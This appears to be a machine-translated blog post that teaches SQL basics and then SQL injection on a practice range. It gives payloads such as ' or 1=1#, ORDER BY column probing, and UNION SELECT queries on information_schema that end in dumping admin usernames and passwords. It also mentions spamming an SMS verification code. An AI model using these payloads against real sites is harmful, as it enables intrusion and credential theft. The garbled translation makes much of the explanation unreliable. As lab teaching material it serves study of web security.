“This is the 24th day of my participation in the First Challenge 2022. For details: First Challenge 2022”

preface

This is used to write articles in CSDN handling to the nuggets, is also one of the SQL series post an article, after reading the SQL database operation summary reading this article will be very smooth ~ database security has always been we do web development, especially when used to play safe, sqlmap that old rascal is not a joke, Of course, the current framework does have a lot of maintenance to it, and it’s not likely to cause major problems. For example, Django comes with a built-in SQL anti-injection module. In addition to a certain individual or using PHP website maintenance in hundreds of years of that kind of won’t appear too big problems, basically was yao said today (Monday) and I remember a year ago I brush the spring and autumn period and the like have a unlimited phone verification code, of course, this has nothing to do with SQL is the somebody else not set phone verification code refresh time and image authentication code in web pages to find the answer, That thing, you write a crawler for a message harassment, I think it’s gone now.

For those who have no basic knowledge, please make a detourBasic Use of Mariadb (one article covers basic operations)The mariadb and SQL operations are basically the same, but now one is open source, the other is not. Tell a joke, the whole world can be injected, but not into your heart.(Subtext, you do not belong to the collection of the whole world, suppose you belong to the collection of human beings, human beings belong to the collection of the world, you do not belong to the collection of the world, so you do not belong to the collection of human beings, so conclude: you are not a person!!)

Conditions of the query

Let’s look at the table in contextSo what’s the conditional query method, which is essentially adding a WHERE statement and here’s an example.So let’s say we extract Ming

select * from hello where id=1; orselect * from hello where name="Xiao Ming"; orselect * from hello where name="Xiao Ming"or id = 1; orselect * from hello where id=1 and age=15;
Copy the code

The query sequence

Order by = desc; order by = desc; Default order.

select * from hello;
#select * from hello order by desc;
Copy the code

But that’s not the point. Is this

select * from hello order by 1;
select * from hello order by 3;
Copy the code

Take a closer look at the following two resultsYou will find this sum

select * from hello order by id;
select * from hello order by age;
Copy the code

Is equivalent. So what does this actually do, not just for sorting, but actually for injection to see how many fields there are. For example

Limit Limit result

Limit x,y. X is where to start. Y is how many we take from x. For example limit 0,2 takes the first one, the second one and so on so limit 1,2 takes the second one, the third one

The joint query

Let’s take an example of extracting names and ages, using a federated query.

select name from hello union select age from hello;
Copy the code

So this is the combination of two different outcomes. Two points to note: First, the query for that union part can be two different tables. The second is that the two results of a federated query must have the same columns. Here’s an example:

Now notice one more result

Show dislocation

Well, first we need to know the number of fields returned in the first half of that query. What does it do? Look at the following example. How to play, see the results of the example.

SQL built-in functions

View database name

select database();
Copy the code

To view the userCheck the versionGo back to the summary

Own database and tables

This is its own, mainly is to store some tables, databases, user information. This is very important, because this is basically the pointcut where penetration injection is done, getting the user and password of the database.Like the correlation of this tableHere’s an example:

Mycli auxiliary command

This is a nice thing, written in Python, to have a command prompt to make things easier for you.

Sql injection type

This is divided into two kinds, one is plastic injection, one is character injection. What’s the difference between these two things, or why they’re divided into these two things, really comes down to the query statement. In a URL, a typical “? The following id=1 is combined with the background data interaction to generate a query, for example:

https://hello.com?id=5Let's say this is the url of the page switchsqlThe query statement might beselect html_view from html_views where id = 5This is plastic surgery orselect html_view from html_views where id = '5'This is the characterCopy the code

Now let’s try 1 plus 1Obviously, this thing treats that as a character, and it makes sense that if it’s an integer 1+1 is 2 then it’s going to return this pageNow try, take all of that data, inject it, this is low-level so there’s no filtering, just inject it.So this is sort of a statement

select * from table where id=' ' or 1=1#';
Copy the code

That’s just equivalent to. In addition, this is not a blind shot, there are obvious hints, is a relatively basic range. Just watch the fun. This example focuses on injection types.

Actual combat range

If it wasn’t for me, if it wasn’t for that guy, we’d be at the firing range. This is a classic example where we got his administrator password

Determines whether there is an injection point for a type

In fact, it’s the id injection point, but it depends on what type of id it is. You have to put a # in there for character injection.

Let’s see how many fields he has

This is a chance call. No. 3Guess the two of them

Database query

What’s the play? Watch thisSo, get the database

Get table name

This is just a look. Let me make it clear. Remember that earlier instruction

union select table_name from information_schema.tables where table_schema='huterox';
Copy the code

I’m going to introduce a function called group_concat() that actually looks at what’s in the current field 

union select table_name from information_schema.tables where table_schema='maoshe';
Copy the code

We query the current table, the field name of the table where the maoShe is stored, and we also need to get its value to know what tables are in it. So work on it

union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'
Copy the code

Explosive field name

Blind guess a wave is Admin, there is what I want. Let’s see what’s inside the admin user.

union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
Copy the code

Obtain the password and view the value of the password field

union select 1,group_concat(username,":",password) from maoshe.admin
Copy the code

conclusion

1. Guess how many fields there are. 2. Know some of SQL’s built-in databases, such as where tables are placed and so on. 4. Lucky to get a buggy website, except for the shooting range. It is important to know which guessing user table is in the database and which retrieving field values are in the guessing user table